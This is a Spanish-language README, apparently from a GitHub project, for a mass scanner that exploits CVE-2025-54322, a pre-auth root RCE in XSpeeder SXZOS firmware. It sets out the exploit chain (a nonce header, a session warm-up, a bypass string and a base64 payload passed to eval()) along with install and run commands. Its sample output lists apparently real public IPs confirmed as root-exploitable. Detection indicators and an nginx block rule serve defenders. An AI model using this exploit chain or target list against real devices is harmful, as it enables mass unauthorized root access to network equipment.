
CVE-2025-54322 - XSpeeder SXZOS Buscador rápido de 0day RCE pre-auth
Un escáner de vulnerabilidades multihilo para CVE-2025-54322, una vulnerabilidad de ejecución remota de código no autenticada en el firmware XSpeeder SXZOS que afecta a más de ~70.000 hosts a nivel mundial.
CVE-2025-54322 es una vulnerabilidad crítica de ejecución remota de código sin autenticación previa descubierta en el firmware XSpeeder SXZOS, que alimenta dispositivos SD-WAN, enrutadores y equipos de red perimetral.
La vulnerabilidad existe en la interfaz web basada en Django del firmware SXZOS:
/?title=ABC&oIp=XXX&chkid=[base64_payload]eval() de Python en la entrada de usuario decodificada en base641. Calculate time-based nonce for X-SXZ-R header
2. Warm up session via /webInfos/ endpoint
3. Craft malicious payload with bypass string (#sUserCodexsPwd)
4. Base64 encode payload
5. Send exploit with exactly 3 query parameters
6. Server decodes and evaluates payload
7. Commands execute with root privileges
El exploit sortea múltiples capas de defensa:
SXZ/2.3X-SXZ-R: [0-6]/webInfos/#sUserCodexsPwdvuln-confirm.txt inmediatamente# Clonar el repositorio
git clone https://github.com/Sachinart/CVE-2025-54322.git
cd CVE-2025-54322
# Instalar dependencias requeridas
pip install -r requirements.txt
Crea un archivo requirements.txt:
requests>=2.31.0
urllib3>=2.0.0
python3 scanner.py targets.txt
# Escanear con número personalizado de hilos (por defecto: 10)
python3 scanner.py targets.txt 20
# Escanear con máximo de hilos para resultados más rápidos
python3 scanner.py targets.txt 50
# Escanear con número conservador de hilos
python3 scanner.py targets.txt 5
Crea un archivo targets.txt con un objetivo por línea:
https://192.168.1.100:4433
https://10.0.0.50:8443
https://example.com:4433
http://vulnerable-device.local
$ python3 scanner.py targets.txt 20
╔═══════════════════════════════════════════════════════════════╗
║ XSpeeder SXZOS (CVE-2025-54322) RCE Scanner ║
║ Pre-Auth Root RCE Vulnerability Checker ║
║ Showing: VULNERABLE HOSTS ONLY ║
╚═══════════════════════════════════════════════════════════════╝
[*] Loaded 2338 targets from targets.txt
[*] Using 20 concurrent threads
[*] Vulnerable hosts will be saved to: vuln-confirm.txt
[*] Starting scan...
======================================================================
[+] VULNERABLE: https://27.40.80.93:4433
[+] Status: VULNERABLE - RCE Confirmed
[+] HTTP Status: 500
[+] Output: uid=0(root) gid=0(root)
======================================================================
[*] Progress: 50/2338 | Found: 12 vulnerable
[*] Progress: 100/2338 | Found: 24 vulnerable
======================================================================
[*] SCAN COMPLETE
======================================================================
[*] Total Time: 890.45 seconds
[*] Total Targets Scanned: 2338
[*] Vulnerable Hosts Found: 156
[*] Success Rate: 6.67%
======================================================================
El escáner muestra:
vuln-confirm.txt)XSpeeder SXZOS CVE-2025-54322 - Vulnerable Hosts
Scan started: 2025-12-27 15:30:45
======================================================================
https://27.40.80.93:4433
Status: VULNERABLE - RCE Confirmed
Output: uid=0(root) gid=0(root)
----------------------------------------------------------------------
https://27.40.83.189:4433
Status: VULNERABLE - RCE Confirmed
Output: uid=0(root) gid=0(root)
----------------------------------------------------------------------
======================================================================
Scan completed: 2025-12-27 15:45:30
Total scanned: 2338
Vulnerable: 156
Time taken: 890.45 seconds
Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.
Si descubre sistemas vulnerables:
Si administra dispositivos XSpeeder SXZOS:
Busque estos indicadores en los registros:
/?title=*&oIp=*&chkid=* con cargas útiles en base64SXZ/2.3X-SXZ-R inusuales#sUserCodexsPwd/webInfos/ seguidas de la ruta raíz# Regla de Nginx para bloquear intentos de explotación
location / {
if ($args ~* "chkid=") {
return 403;
}
}
Esta vulnerabilidad fue descubierta de forma autónoma por pwn.ai, una plataforma de investigación de seguridad impulsada por IA.
Nota Importante: Esta es la primera vulnerabilidad RCE zero-day encontrada por agentes, explotable de forma remota y documentada públicamente.
Chirag Artani
Esta implementación del escáner fue creada para ayudar a los profesionales de seguridad a:
Este proyecto está licenciado bajo la Licencia MIT - consulte el archivo LICENSE para más detalles.
¡Las contribuciones son bienvenidas! No dude en enviar una Solicitud de Cambio (Pull Request).
Para preguntas, problemas o sugerencias:
Recuerde: Un gran poder conlleva una gran responsabilidad. Use esta herramienta de manera ética y legal.
Manténgase Seguro. Manténgase Ético. Manténgase Legal.
| Cantidad de Objetivos | Hilos Recomendados | Tiempo Esperado |
|---|
| 1-10 | 5 hilos | ~1-2 min |
| 10-50 | 10 hilos | ~3-5 min |
| 50-100 | 20 hilos | ~5-10 min |
| 100-500 | 30 hilos | ~10-20 min |
| 500+ | 40-50 hilos | ~20+ min |